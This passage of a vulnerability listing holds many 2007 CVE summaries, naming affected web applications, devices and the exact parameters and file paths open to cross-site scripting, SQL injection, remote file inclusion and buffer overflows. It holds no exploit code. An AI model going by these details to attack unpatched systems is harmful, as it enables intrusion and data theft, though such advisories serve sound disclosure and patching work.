allows remote attackers to inject arbitrary web script or HTML via a gopher URI that uses single quote characters to delimit a literal string within an XSS sequence, a related issue to CVE-2007-5415. [CVE-2007-5411] Cross-site scripting (XSS) vulnerability in the Linksys SPA941 VoIP Phone with firmware 5.1.8 allows remote attackers to inject arbitrary web script or HTML via the From header in a SIP message. [CVE-2007-5410] PHP remote file inclusion vulnerability in admin.wmtrssreader.php in the webmaster-tips.net Flash RSS Reader (com_wmtrssreader) 1.0 component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter. [CVE-2007-5403] Multiple cross-site scripting (XSS) vulnerabilities in Layton HelpBox 3.7.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) Forename, (2) Surname, (3) Telephone, and (4) Fax fields to writeenduserenduser.asp [CVE-2007-5388] Multiple PHP remote file inclusion vulnerabilities in WebDesktop 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) app parameter to apps/apps.php and the (2) wsk parameter to wsk/wsk.php. [CVE-2007-5386] Cross-site scripting (XSS) vulnerability in scripts/setup.php in phpMyAdmin 2.11.1, when accessed by a browser that does not URL-encode requests, allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2007-5385] Multiple cross-site scripting (XSS) vulnerabilities in the Thomson/Alcatel SpeedTouch 7G router, as used for the BT Home Hub 6.2.6.B and earlier, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5380] Session fixation vulnerability in Rails before 1.2.4, as used for Ruby on Rails, allows remote attackers to hijack web sessions via unspecified vectors related to "URL-based sessions." [CVE-2007-5375] Interpretation conflict in the Sun Java Virtual Machine (JVM) allows user-assisted remote attackers to conduct a multi-pin DNS rebinding attack and execute arbitrary JavaScript in an intranet context, when an intranet web server has an HTML document that references a "mayscript=true" Java applet through a local relative URI, which may be associated with different IP addresses by the browser and the JVM. [CVE-2007-5370] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/dnewsweb.exe in NetWin DNewsWeb (DNews News Server) 57e1 allow remote attackers to inject arbitrary web script or HTML via the (1) group or (2) utag parameter. [CVE-2007-5366] The Tomcat 4.1-based Servlet Service in Fujitsu Interstage Application Server 7.0 through 9.0.0 and Interstage Apworks/Studio 7.0 through 9.0.0 allows remote attackers to obtain sensitive information (web root path) via unspecified vectors that trigger an error message, probably related to enabling the useCanonCaches Java Virtual Machine (JVM) option. [CVE-2007-5355] The Web Proxy Auto-Discovery (WPAD) feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct man-in-the-middle (MITM) attacks. [CVE-2007-5344] Microsoft Internet Explorer 5.01 through 7 allows remote attackers to execute arbitrary code via a crafted website using Javascript that creates, modifies, deletes, and accesses document objects using the tags property, which triggers heap corruption, related to uninitialized or deleted objects, a different issue than CVE-2007-3902 and CVE-2007-3903, and a variant of "Uninitialized Memory Corruption Vulnerability." [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler. [CVE-2007-5337] Mozilla Firefox before 2.0.0.8 and SeaMonkey before 1.1.5, when running on Linux systems with gnome-vfs support, might allow remote attackers to read arbitrary files on SSH/sftp servers that accept key authentication by creating a web page on the target server, in which the web page contains URIs with (1) smb: or (2) sftp: schemes that access other files from the server. [CVE-2007-5327] Stack-based buffer overflow in the RPC interface for the Message Engine (mediasvr.exe) in CA BrightStor ARCServe BackUp v9.01 through R11.5, and Enterprise Backup r10.5, allows remote attackers to execute arbitrary code via a long argument in the 0x10d opnum. [CVE-2007-5318] Unspecified vulnerability in preview.php in TYPOlight webCMS 2.4.6 allows remote attackers to download arbitrary files via the src parameter. NOTE: the provenance of this information is unknown [CVE-2007-5314] PHP remote file inclusion vulnerability in system/funcs/xkurl.php in xKiosk WEB 3.0.1i, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the PEARPATH parameter. [CVE-2007-5312] Cross-site scripting (XSS) vulnerability in TorrentTrader Classic 1.07 allows remote attackers to inject arbitrary web script or HTML via the (1) color parameter to pjirc/css.php and the (2) cat parameter to browse.php. [CVE-2007-5310] PHP remote file inclusion vulnerability in admin.wmtportfolio.php in the webmaster-tips.net wmtportfolio 1.0 (com_wmtportfolio) component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. [CVE-2007-5309] PHP remote file inclusion vulnerability in admin.wmtgallery.php in the webmaster-tips.net Flash Image Gallery (com_wmtgallery) 1.0 component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter. [CVE-2007-5304] Multiple cross-site scripting (XSS) vulnerabilities in ELSEIF CMS Beta 0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) repertimage parameter to utilisateurs/vousetesbannis.php, the (2) elseifvotetxtresultatduvote parameter to utilisateurs/votesresultats.php, and the (3) elseifforumtxtmenugeneraleduforum parameter to moduleajouter/depot/adminforum.php. [CVE-2007-5303] Cross-site scripting (XSS) vulnerability in news_page.php in SnewsCMS Rus 2.1 allows remote attackers to inject arbitrary web script or HTML via the page_id parameter. [CVE-2007-5302] Multiple cross-site scripting (XSS) vulnerabilities in HP System Management Homepage (SMH) in HP-UX B.11.11, B.11.23, and B.11.31, and SMH before 2.1.10 for Linux and Windows, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5297] Cross-site scripting (XSS) vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2007-5296] Multiple cross-site scripting (XSS) vulnerabilities in dblisttest.asp in dbList 8.1 allow remote attackers to inject arbitrary web script or HTML via the (1) db, (2) pagesize, (3) sort, (4) strKeyWords, and (5) table parameters. NOTE: some of these details are obtained from third party information. [CVE-2007-5295] Multiple cross-site scripting (XSS) vulnerabilities in index.php in (a) Wikepage Opus 13 2007.2 and (b) TipiWiki 2 allow remote attackers to inject arbitrary web script or HTML via the (1) PageContent and (2) PageName parameters. [CVE-2007-5293] Multiple cross-site scripting (XSS) vulnerabilities in IDMOS 1.0-beta (aka Phoenix) allow remote attackers to inject arbitrary web script or HTML via the (1) err_msg parameter to error.php and the (2) content parameter to templates/simple/ia.php. [CVE-2007-5292] Cross-site scripting (XSS) vulnerability in photos.cfm in Directory Image Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the backwardDirectory parameter. [CVE-2007-5291] Cross-site scripting (XSS) vulnerability in Edit.asp in DB Manager 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2007-5290] Multiple cross-site scripting (XSS) vulnerabilities in MailBee WebMail Pro 3.4 and earlier [CVE-2007-5282] Hitachi Cosminexus Agent 03-00 through 03-05, and Cosminexus Library Standard and Web Edition 04-00 and 04-01, might allow remote attackers to cause a denial of service (agent process crash) via invalid data from clients other than Cosminexus Manager. [CVE-2007-5280] Multiple cross-site scripting (XSS) vulnerabilities in messages.jsp in AppFuse before 2.0 Final allow remote attackers to inject arbitrary web script or HTML via unspecified input that is recorded in (1) success or (2) error messages. [CVE-2007-5278] Zomplog 3.8.1 and earlier stores potentially sensitive information under the web root with insufficient access control, which allows remote attackers to download files that were uploaded by users, as demonstrated by obtaining a directory listing via a direct request to /upload and then retrieving individual files. NOTE: in a non-default configuration, the directory listing is denied, but filenames may be predicable. [CVE-2007-5271] Multiple PHP remote file inclusion vulnerabilities in Trionic Cite CMS 1.2 rev9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the bField[bf_data] parameter to (1) interface/editors/-custom.php or (2) interface/editors/custom.php. [CVE-2007-5265] Multiple format string vulnerabilities in websrv.cpp in Dawn of Time 1.69s beta4 and earlier allow remote attackers to execute arbitrary code via format string specifiers in the (1) username or (2) password fields when accessing certain "restricted zones", which are not properly handled by the (a) processWebHeader and (b) filterWebRequest functions. [CVE-2007-5260] ASP-CMS 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing the username and password via a direct request for mdb-database/ASP-CMS_v100.mdb. [CVE-2007-5256] Multiple stack-based buffer overflows in FSD 2.052 d9 and earlier, and FSFDT FSD 3.000 d9 and earlier, allow (1) remote attackers to execute arbitrary code via a long HELP command on TCP port 3010 to the sysuser::exechelp function in sysuser.cc and (2) remote authenticated users to execute arbitrary code via long commands on TCP port 6809 to the servinterface::sendmulticast function in servinterface.cc, as demonstrated by a PIcallsign command. [CVE-2007-5255] Cross-site scripting (XSS) vulnerability in Google Mini Search Appliance 3.4.14 allows remote attackers to inject arbitrary web script or HTML via the ie parameter to the /search URI. [CVE-2007-5253] c32web.exe in McMurtrey/Whitaker Cart32 before 6.4 allows remote attackers to read arbitrary files via the ImageName parameter in a GetImage action, by appending a NULL byte (%00) sequence followed by an image file extension, as demonstrated by a request for a ".txt%00.gif" file. NOTE: this might be a directory traversal vulnerability. [CVE-2007-5251] Multiple cross-site scripting (XSS) vulnerabilities in Helm 3.2.16 allow remote attackers to inject arbitrary web script or HTML via (1) the showOption parameter to domain.asp, or the (2) Folder or (3) StartPath parameter to FileManager.asp. [CVE-2007-5239] Java Web Start in Sun JDK and JRE 6 Update 2 and earlier, JDK and JRE 5.0 Update 12 and earlier, SDK and JRE 1.4.2_15 and earlier, and SDK and JRE 1.3.1_20 and earlier does not properly enforce access restrictions for untrusted (1) applications and (2) applets, which allows user-assisted remote attackers to copy or rename arbitrary files when local users perform drag-and-drop operations from the untrusted application or applet window onto certain types of desktop applications. [CVE-2007-5238] Java Web Start in Sun JDK and JRE 6 Update 2 and earlier, JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to obtain sensitive information (the Java Web Start cache location) via an untrusted application, aka "three vulnerabilities." [CVE-2007-5237] Java Web Start in Sun JDK and JRE 6 Update 2 and earlier does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read and modify local files via an untrusted application, aka "two vulnerabilities." [CVE-2007-5236] Java Web Start in Sun JDK and JRE 5.0 Update 12 and earlier, and SDK and JRE 1.4.2_15 and earlier, on Windows does not properly enforce access restrictions for untrusted applications, which allows user-assisted remote attackers to read local files via an untrusted application. [CVE-2007-5235] Cross-site scripting (XSS) vulnerability in index.php in Uebimiau 2.7.2 through 2.7.10 allows remote attackers to inject arbitrary web script or HTML via the f_email parameter. NOTE: the provenance of this information is unknown [CVE-2007-5233] SQL injection vulnerability in index.php in Web Template Management System 1.3 allows remote attackers to execute arbitrary SQL commands via the id parameter in a readmore action. [CVE-2007-5228] Cross-site scripting (XSS) vulnerability in the subscription functionality in the Project issue tracking module before 4.7.x-1.5, 4.7.x-2.x before 4.7.x-2.5, and 5.x-1.x before 5.x-1.1 for Drupal allows remote authenticated users with project create or edit permissions to inject arbitrary web script or HTML via unspecified vectors involving a (1) individual or (2) overview form. [CVE-2007-5227] Multiple cross-site scripting (XSS) vulnerabilities in messaging/course/composeMessage.jsp in BlackBoard Learning System 6.3.1.593 and earlier in BlackBoard Academic Suite allow remote attackers to inject arbitrary web script or HTML via the (1) subject_t and (2) body_text parameters. NOTE: vector 2 requires bypassing a client-side security mechanism that attempts to block XSS sequences. [CVE-2007-5218] Cross-site scripting (XSS) vulnerability in index.php in Don Barnes DRBGuestbook 1.1.13 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2007-5214] Multiple cross-site scripting (XSS) vulnerabilities in the AXIS 2100 Network Camera 2.02 with firmware 2.43 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to the default URI associated with a directory, as demonstrated by (a) the root directory and (b) the view/ directory [CVE-2007-5212] Multiple cross-site scripting (XSS) vulnerabilities in the AXIS 2100 Network Camera 2.02 with firmware before 2.43 allow remote attackers to inject arbitrary web script or HTML via (1) parameters associated with saved settings, as demonstrated by the conf_SMTP_MailServer1 parameter to ServerManager.srv [CVE-2007-5211] Multiple cross-site scripting (XSS) vulnerabilities in Arbor Networks Peakflow SP 3.5.1 before patch 14, and 3.6.1 before patch 5, when scope accounts are enabled, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving GET or POST requests. NOTE: the provenance of this information is unknown [CVE-2007-5198] Buffer overflow in the redir function in check_http.c in Nagios Plugins before 1.4.10, when running with the -f (follow) option, allows remote web servers to execute arbitrary code via Location header responses (redirects) with a large number of leading "L" characters. [CVE-2007-5193] The default configuration for twiki 4.1.2 on Debian GNU/Linux, and possibly other operating systems, specifies the work area directory (cfg{RCS}{WorkAreaDir}) under the web document root, which might allow remote attackers to obtain sensitive information when .htaccess restrictions are not applied. [CVE-2007-5190] Multiple cross-site scripting (XSS) vulnerabilities in Alcatel OmniVista 4760 R4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the action parameter to php-bin/Webclient.php or (2) the Langue parameter to the default URI. [CVE-2007-5189] Multiple SQL injection vulnerabilities in mes_add.php in x-script GuestBook 1.3a, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) icq, and (4) website parameters. [CVE-2007-5183] Cross-site scripting (XSS) vulnerability in Mailbox.mws in OdysseySuite, possibly 4.0.729, allows remote attackers to inject arbitrary web script or HTML via the idkey parameter. [CVE-2007-5182] Cross-site scripting (XSS) vulnerability in mail.asp in Netkamp Emlak Scripti allows remote attackers to inject arbitrary web script or HTML via the (1) Email parameter, and possibly the (2) Ad, (3) Soyad, (4) Konu, and (5) Mesaj parameters to iletisim.asp. [CVE-2007-5179] Multiple cross-site scripting (XSS) vulnerabilities in iletisim.asp in Y&K Iletisim Formu allow remote attackers to inject arbitrary web script or HTML via the (1) ad, (2) sehir, (3) yas, (4) cins, (5) tel, (6) mail, and (7) mesaj parameters. NOTE: the provenance of this information is unknown [CVE-2007-5176] Multiple cross-site scripting (XSS) vulnerabilities in GroupLink eHelpDesk 6.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) NA_DISPLAYNAME parameter in helpdesk/user/rf_create.jsp and the (2) username and (3) LDAPError parameters in index2.jsp. NOTE: the provenance of this information is unknown [CVE-2007-5162] The connect method in lib/net/http.rb in the (1) Net::HTTP and (2) Net::HTTPS libraries in Ruby 1.8.5 and 1.8.6 does not verify that the commonName (CN) field in a server certificate matches the domain name in an HTTPS request, which makes it easier for remote attackers to intercept SSL transmissions via a man-in-the-middle attack or spoofed web site. [CVE-2007-5161] Cross-zone scripting vulnerability in the internal browser in i-Systems Feedreader 3.10 allows remote attackers to inject arbitrary web script or HTML via an item in a feed, as demonstrated by a WordPress blog update. NOTE: this was originally reported as XSS. [CVE-2007-5154] Session fixation vulnerability in Aipo and Aipo ASP 3.0.1.0 and earlier allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2007-5142] Cross-site scripting (XSS) vulnerability in buscar.asp in Solidweb Novus 1.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: the provenance of this information is unknown [CVE-2007-5136] Cross-site scripting (XSS) vulnerability in DFD Cart 1.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5134] Cisco Catalyst 6500 and Cisco 7600 series devices use 127/8 IP addresses for Ethernet Out-of-Band Channel (EOBC) internal communication, which might allow remote attackers to send packets to an interface for which network exposure was unintended. [CVE-2007-5129] SimpGB 1.46.02 stores sensitive information under the web root with insufficient access control, which allows remote attackers to (1) obtain sensitive configuration information via a direct request for admin/cfginfo.php [CVE-2007-5127] Multiple cross-site scripting (XSS) vulnerabilities in SimpGB 1.46.02 allow remote attackers to inject arbitrary web script or HTML via (1) the l_username parameter to the default URI under admin/ or (2) the l_emoticonlist parameter to admin/emoticonlist.php. [CVE-2007-5124] The embedded Internet Explorer server control in AOL Instant Messenger (AIM) 6.5.3.12 and earlier allows remote attackers to execute arbitrary code via unspecified web script or HTML in an instant message, related to AIM's filtering of "specific tags and attributes" and the lack of Local Machine Zone lockdown. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4901. [CVE-2007-5121] Cross-site scripting (XSS) vulnerability in JSPWiki 2.5.139-beta allows remote attackers to inject arbitrary web script or HTML via the redirect parameter to wiki-3/Login.jsp and unspecified other components. [CVE-2007-5120] Multiple cross-site scripting (XSS) vulnerabilities in JSPWiki 2.4.103 and 2.5.139-beta allow remote attackers to inject arbitrary web script or HTML via the (1) group and (2) members parameters in (a) NewGroup.jsp [CVE-2007-5118] Unspecified vulnerability in the HID (Human Interface Device) class driver in Sun Solaris 8, 9, and 10 before 20070925 allows local users to cause a denial of service (panic) via unspecified vectors. [CVE-2007-5113] report.cgi in Google Urchin allows remote attackers to bypass authentication and obtain sensitive information (web server logs) via certain modified query parameters, as demonstrated using the profile, rid, prefs, n, vid, bd, ed, dt, and gtype parameters, a different vulnerability than CVE-2007-5112. [CVE-2007-5112] Cross-site scripting (XSS) vulnerability in session.cgi (aka the login page) in Google Urchin 5 5.7.03 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, a different vulnerability than CVE-2007-4713. NOTE: this can be leveraged to capture login credentials in some browsers that support remembered (auto-completed) passwords. [CVE-2007-5106] Cross-site scripting (XSS) vulnerability in wp-register.php in WordPress 2.0 allows remote attackers to inject arbitrary web script or HTML via the user_login parameter. [CVE-2007-5105] Cross-site scripting (XSS) vulnerability in wp-register.php in WordPress 2.0 and 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the user_email parameter. [CVE-2007-5096] PHP remote file inclusion vulnerability in modules/webmail2/inc/rfc822.php in guanxiCRM Business Solution 0.9.1 allows remote attackers to execute arbitrary PHP code via a URL in the webmail2_inc_dir parameter. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-5093] The disconnect method in the Philips USB Webcam (pwc) driver in Linux kernel 2.6.x before 2.6.22.6 "relies on user space to close the device," which allows user-assisted local attackers to cause a denial of service (USB subsystem hang and CPU consumption in khubd) by not closing the device after the disconnect is invoked. NOTE: this rarely crosses privilege boundaries, unless the attacker can convince the victim to unplug the affected device. [CVE-2007-5091] Multiple cross-site scripting (XSS) vulnerabilities in eGroupWare 1.4.001 allow remote attackers to inject arbitrary web script or HTML via the cat_data[color] parameter to (1) preferences/inc/class.uicategories.inc.php and (2) admin/inc/class.uicategories.inc.php. [CVE-2007-5088] Cross-site scripting (XSS) vulnerability in search/cust_bill_event.cgi in Freeside 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the failed parameter. [CVE-2007-5078] Multiple cross-site scripting (XSS) vulnerabilities in eGov Manager allow remote attackers to inject arbitrary web script or HTML via unspecified "user-supplied input" to (1) center.exe or (2) Index.exe. [CVE-2007-5072] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog (SPHPBlog) before 0.5.1, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via certain user_colors array parameters to certain user_style.php files under themes/, as demonstrated by the user_colors[bg_color] parameter. [CVE-2007-5067] Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1) xigui32.exe or (2) xitami.exe. [CVE-2007-5066] Unspecified vulnerability in Webmin before 1.370 on Windows allows remote authenticated users to execute arbitrary commands via a crafted URL. [CVE-2007-5064] Buffer overflow in a certain ActiveX control in Xunlei Web Thunder 5.6.9.344, possibly the DapPlayer ActiveX control in DapPlayer_Now.dll, allows remote attackers to execute arbitrary code via a long first argument to the DownURL2 method. NOTE: some of these details are obtained from third party information. [CVE-2007-5063] Adam Scheinberg Flip 3.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing login credentials via a direct request for var/users.txt. [CVE-2007-5059] Multiple cross-site scripting (XSS) vulnerabilities in GreenSQL allow remote attackers to inject arbitrary web script or HTML via several vectors, as demonstrated by the (1) uname and (2) pass parameters in a login form, and (3) an unspecified "url value," leading to storage of XSS sequences in the database and display of these sequences in the alert section of the admin panel. [CVE-2007-5052] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Vigile CMS 1.8 allow remote attackers to inject arbitrary web script or HTML via a request to the wiki module with (1) the title parameter or (2) a "title=" sequence in the PATH_INFO, or a request to the download module with (3) the cat parameter or (4) a "cat=" sequence in the PATH_INFO. [CVE-2007-5051] Multiple cross-site scripting (XSS) vulnerabilities in PhpGedView 4.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) box_width, (2) PEDIGREE_GENERATIONS, and (3) rootid parameters in ancestry.php, and the (4) newpid parameter in timeline.php. NOTE: the provenance of this information is unknown [CVE-2007-5038] The offer_account_by_email function in User.pm in the WebService for Bugzilla before 3.0.2, and 3.1.x before 3.1.2, does not check the value of the createemailregexp parameter, which allows remote attackers to bypass intended restrictions on account creation. [CVE-2007-5033] Cross-site scripting (XSS) vulnerability in profile.php in phpBB XS 2 allows remote attackers to inject arbitrary web script or HTML via the selfdes parameter in a profile_info editprofile action. [CVE-2007-5027] Multiple cross-site scripting (XSS) vulnerabilities in cgi-bin/ddns in the web management panel for the WBR3404TX broadband router with firmware R1.94p0vTIG allow remote attackers to inject arbitrary web script or HTML via the (1) DD or (2) DU parameter. [CVE-2007-5026] dBlog CMS, probably 2.0, stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing an admin password hash via a direct request for dblog.mdb. [CVE-2007-5019] Buffer overflow in the Sun Java Web Start ActiveX control in Java Runtime Environment (JRE) 1.6.0_X allows remote attackers to have an unknown impact via a long argument to the dnsResolve (isInstalled.dnsResolve) method. [CVE-2007-5013] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Phormer 3.31 allow remote attackers to inject arbitrary web script or HTML via the (1) u, (2) p, (3) c, and (4) s parameters, and other unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2007-5012] Cross-site scripting (XSS) vulnerability in picture.php in PhpWebGallery 1.7.0, when Comments for all is enabled, allows remote attackers to inject arbitrary web script or HTML via the author parameter. NOTE: the provenance of this information is unknown [CVE-2007-5011] webbatch.exe in WebBatch allows remote attackers to obtain sensitive information via the dumpinputdata parameter. [CVE-2007-5010] Cross-site scripting (XSS) vulnerability in WebBatch allows remote attackers to inject arbitrary web script or HTML via the URL to webbatch.exe. [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4983] Directory traversal vulnerability in the JetAudio.Interface.1 ActiveX control in JetFlExt.dll in jetAudio 7.0.3 Basic and 7.0.3.3016 allows remote attackers to create or overwrite arbitrary local files via a ..\ (dot dot backslash) in the second argument to the DownloadFromMusicStore method. NOTE: some of these details are obtained from third party information. NOTE: this can be leveraged for code execution by overwriting JetAudio.exe, which is launched by the control after completion of the method call. [CVE-2007-4981] Cross-site scripting (XSS) vulnerability in the save function in Obedit 3.03 allows user-assisted remote attackers to inject arbitrary web script or HTML via unknown vectors, as demonstrated by a SCRIPT element in an unspecified context when saving a document. NOTE: because the details of the attack are uncertain, it is unclear whether this crosses privilege boundaries. [CVE-2007-4977] Cross-site scripting (XSS) vulnerability in mode.php in Coppermine Photo Gallery (CPG) 1.4.12 and earlier allows remote attackers to inject arbitrary web script or HTML via the referer parameter. [CVE-2007-4975] Cross-site scripting (XSS) vulnerability in hilfe.php in b1gMail 6.3.1 allows remote attackers to inject arbitrary web script or HTML via the chapter parameter. [CVE-2007-4959] Cross-site scripting (XSS) vulnerability in catalog_products_with_images.php in osCMax 2.0.0-RC3-0-1 allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: the provenance of this information is unknown [CVE-2007-4958] Multiple cross-site scripting (XSS) vulnerabilities in TinyWebGallery (TWG) 1.6.3.4 allow remote attackers to inject arbitrary web script or HTML via the URI for (1) index.php, (2) i_frames/i_login.php, and (3) i_frames/i_top_tags.php. NOTE: the provenance of this information is unknown [CVE-2007-4949] DISPUTED Multiple PHP remote file inclusion vulnerabilities in php(Reactor) 1.2.7pl1 allow remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter to (1) ekilat.com-int.tpl.php, (2) phpreactor.org-top.tpl.php, or (3) ekilat.com-top.tpl.php in examples/. NOTE: this issue has been disputed by CVE, since the vulnerability is present only when the product is incorrectly installed by placing examples/ under the web root. [CVE-2007-4948] Multiple PHP remote file inclusion vulnerabilities in Webmedia Explorer (webmex) 3.2.2 allow remote attackers to execute arbitrary PHP code via (1) a URL in the path_include parameter to includes/rss.class.php, (2) a URL in the path_template parameter to (a) templates/main.tpl.php or (b) templates/folder_messages_link_message_name.tpl.php, or (4) a URL in the path_templates parameter to templates/sidebar.tpl.php. NOTE: the vulnerability is present only when the administrator does not follow installation instructions about the requirement for .htaccess support. NOTE: the includes/core.lib.php vector is already covered by CVE-2006-5252. [CVE-2007-4945] Multiple cross-site scripting (XSS) vulnerabilities in LetterGrade allow remote attackers to inject arbitrary web script or HTML via (1) a student's email address, (2) the year parameter to genbrws/Student/cal_month.php3, and other unspecified vectors related to the calendar. NOTE: the provenance of this information is unknown [CVE-2007-4937] CS Guestbook stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the admin name and MD5 password hash via a direct request for base/usr/0.php. [CVE-2007-4932] admin.php in Shop-Script FREE 2.0 and earlier sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to access the admin panel. [CVE-2007-4929] Multiple cross-site scripting (XSS) vulnerabilities in the AXIS 207W camera allow remote attackers to inject arbitrary web script or HTML via the camNo parameter to incl/image_incl.shtml, and other unspecified vectors. [CVE-2007-4920] SQL injection vulnerability in soporte_derecha_w.php in PHP Webquest 2.5 and earlier allows remote attackers to execute arbitrary SQL commands via the id_actividad parameter. [CVE-2007-4917] Cross-site scripting (XSS) vulnerability in tracking.php in PHP-Stats 0.1.9.2 allows remote attackers to inject arbitrary web script or HTML via the ip parameter in an online action, a different vector than CVE-2007-4334. [CVE-2007-4912] Cross-site scripting (XSS) vulnerability in ips_kernel/class_ajax.php in Invision Power Board (IPB or IP.Board) 2.3.1 up to 20070912 allows remote attackers to inject arbitrary web script or HTML into user profile fields via unspecified vectors related to character sets other than iso-8859-1 or utf-8. [CVE-2007-4909] Interpretation conflict in WinSCP before 4.0.4 allows remote attackers to perform arbitrary file transfers with a remote server via file-transfer commands in the final portion of a (1) scp, and possibly a (2) sftp or (3) ftp, URL, as demonstrated by a URL specifying login to the remote server with a username of scp, which is interpreted as an HTTP scheme name by the protocol handler in a web browser, but is interpreted as a username by WinSCP. NOTE: this is related to an incomplete fix for CVE-2006-3015. [CVE-2007-4901] The embedded Internet Explorer server control in AOL Instant Messenger (AIM) 6.1.41.2 and 6.2.32.1, AIM Pro, and AIM Lite does not properly constrain the use of mshtml.dll's web script and HTML functionality for incoming instant messages, which allows remote attackers to place HTML into unexpected contexts or execute arbitrary code, as demonstrated by writing arbitrary HTML to a notification window, and writing contents of arbitrary local image files to this window via IMG SRC. [CVE-2007-4900] Cross-site scripting (XSS) vulnerability in the logon page in RSA EnVision 3.3.6 Build 0115 allows remote attackers to inject arbitrary web script or HTML via the username field. [CVE-2007-4899] Multiple cross-site scripting (XSS) vulnerabilities in Boinc Forum 5.10.20 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to forum_forum.php, or the search_string parameter to forum_text_search_action.php in a (2) titles or (3) bodies search. [CVE-2007-4896] Multiple cross-site scripting (XSS) vulnerabilities in admin/header.php in Toms Gaestebuch 1.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) lang[adminseite], (2) lang[ueberschrift], or (3) einst[metachar] parameter, different vectors than CVE-2007-4711. [CVE-2007-4894] Multiple SQL injection vulnerabilities in Wordpress before 2.2.3 and Wordpress multi-user (MU) before 1.2.5a allow remote attackers to execute arbitrary SQL commands via the post_type parameter to the pingback.extensions.getPingbacks method in the XMLRPC interface, and other unspecified parameters related to "early database escaping" and missing validation of "query string like parameters." [CVE-2007-4883] Cross-site scripting (XSS) vulnerability in the BotQuery extension in MediaWiki 1.7.x and earlier before SVN 20070910 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a similar issue to CVE-2007-4828. [CVE-2007-4882] Multiple cross-site scripting (XSS) vulnerabilities in TechExcel CustomerWise (formerly TechExcel CRM) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4879] Mozilla Firefox before Firefox 2.0.0.13, and SeaMonkey before 1.1.9, can automatically install TLS client certificates with minimal user interaction, and automatically sends these certificates when requested, which makes it easier for remote web sites to track user activities across domains by requesting the TLS client certificates from other domains. [CVE-2007-4874] Multiple cross-site scripting (XSS) vulnerabilities in SimpNews 2.41.03 allow remote attackers to inject arbitrary web script or HTML via the (1) l_username parameter to admin/layout2b.php, and the (2) backurl parameter to comment.php. [CVE-2007-4873] SimpNews 2.41.03 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download arbitrary .inc files via a direct request, as demonstrated by admin/includes/dbtables.inc. [CVE-2007-4862] Cross-site scripting (XSS) vulnerability in admin/menu.php in SAXON 5.4 allows remote attackers to inject arbitrary web script or HTML via the config[news_url] parameter. [CVE-2007-4850] curl/interface.c in the cURL library (aka libcurl) in PHP 5.2.4 and 5.2.5 allows context-dependent attackers to bypass safe_mode and open_basedir restrictions and read arbitrary files via a file:// request containing a 